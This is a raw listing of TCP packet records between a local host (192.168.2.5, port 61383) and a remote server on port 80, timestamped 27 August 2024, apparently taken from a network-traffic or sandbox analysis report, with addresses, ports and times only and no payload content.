                              Aug 27, 2024 09:49:00.491666079 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.491703033 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.491765022 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.491801977 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.491842985 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.491852999 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.491863012 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.491873980 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.491889954 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.491911888 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.492060900 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.492072105 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.492082119 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.492096901 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.492108107 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.492120028 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.492120981 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.492130995 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.492144108 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.492166996 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.492188931 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.492198944 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.492228031 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.492328882 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.492347002 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.492358923 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.492368937 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.492369890 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.492378950 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.492389917 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.492399931 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.492400885 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.492412090 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.492420912 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.492423058 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.492433071 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.492443085 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.492449045 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.492454052 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.492470026 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.492486954 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.492590904 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.492603064 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.492629051 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.492644072 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.492655039 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.492680073 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.492736101 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.492747068 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.492757082 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.492767096 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.492774010 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.492778063 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.492786884 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.492788076 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.492820978 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.493000031 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.493010998 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.493020058 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.493031025 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.493042946 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.493043900 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.493055105 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.493066072 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.493067026 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.493077993 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.493096113 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.493119001 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.493371964 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.493383884 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.493393898 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.493400097 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.493403912 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.493413925 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.493416071 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.493431091 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.493442059 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.493443012 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.493453979 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.493463039 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.493469000 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.493473053 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.493482113 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.493484020 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.493494034 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.493504047 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.493515015 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.493524075 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.493525028 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.493536949 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.493546963 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.493552923 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.493562937 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.493572950 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.493572950 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.493606091 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.493993044 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.494004011 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.494014025 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.494024038 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.494034052 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.494035959 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.494045973 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.494048119 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.494056940 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.494067907 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.494076014 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.494077921 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.494086981 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.494096041 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.494098902 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.494115114 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.494149923 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.494366884 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.494395971 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.494405985 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.494416952 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.494426966 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.494437933 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.494447947 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.494452000 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.494458914 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.494468927 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.494477034 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.494479895 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.494488955 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.494496107 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.494499922 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.494510889 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.494537115 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.494750023 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.494760990 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.494771004 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.494780064 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.494790077 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.494798899 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.494805098 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.494810104 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.494820118 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.494823933 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.494844913 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.494863987 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.579941988 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.579965115 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.579971075 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.579976082 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.579982042 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.579986095 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.579991102 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.579996109 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.580002069 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.580007076 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.580044031 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.580049038 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.580054045 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.580197096 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.580209970 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.580219984 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.580229044 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.580245018 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.580255032 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.580265999 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.580276012 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.580286980 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.580305099 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.580369949 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.580425978 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.580435991 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.580446959 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.580456972 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.580468893 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.580502987 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.580557108 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.580566883 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.580576897 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.580586910 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.580595970 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.580601931 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.580621004 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.580661058 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.580670118 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.580674887 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.580679893 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.580689907 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.580694914 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.580723047 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.580843925 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.580853939 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.580863953 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.580874920 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.580883026 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.580916882 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.581022978 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.581033945 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.581043959 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.581054926 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.581058979 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.581070900 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.581079960 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.581093073 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.581100941 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.581104994 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.581115961 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.581121922 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.581146002 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.581157923 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.581188917 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.581229925 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.581239939 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.581248999 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.581275940 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.581391096 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.581402063 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.581412077 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.581420898 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.581432104 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.581435919 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.581444025 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.581446886 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.581470013 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.581682920 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.581693888 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.581702948 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.581713915 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.581715107 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.581726074 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.581736088 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.581739902 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.581746101 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.581756115 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.581765890 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.581767082 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.581777096 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.581789970 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.581806898 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.581968069 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.581978083 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.581986904 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.581998110 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.582007885 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.582011938 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.582020998 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.582024097 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.582031965 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.582041979 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.582046032 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.582053900 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.582072020 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.582072973 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.582083941 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.582089901 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.582122087 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.582309961 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.582321882 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.582330942 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.582340002 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.582350016 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.582350016 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.582369089 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.582374096 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.582380056 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.582391024 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.582401037 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.582411051 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.582417965 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.582438946 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.582453966 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.582727909 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.582739115 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.582748890 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.582760096 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.582770109 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.582771063 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.582782030 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.582792044 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.582792044 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.582803011 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.582813978 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.582818031 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.582823038 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.582834005 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.582838058 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.582844019 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.582854033 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.582855940 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.582865000 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.582875013 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.582879066 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.582885981 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.582895994 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.582897902 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.582907915 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.582931042 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.582951069 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.583213091 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.583224058 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.583233118 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.583242893 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.583252907 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.583257914 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.583271980 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.583272934 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.583282948 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.583317041 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.584172010 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.668302059 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.668317080 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.668335915 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.668346882 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.668359041 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.668373108 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.668378115 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.668407917 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.668428898 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.668469906 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.668484926 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.668519974 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.668531895 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.668543100 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.668553114 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.668605089 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.668638945 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.668648958 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.668658972 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.668669939 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.668678999 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.668683052 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.668715954 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.668800116 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.668807983 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.668813944 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.668819904 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.668829918 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.668840885 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.668867111 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.668895006 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.668982983 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.668992996 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.669002056 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.669011116 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.669023037 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.669034004 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.669044018 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.669053078 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.669054985 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.669074059 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.669089079 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.669120073 CEST8061383188.114.97.3192.168.2.5
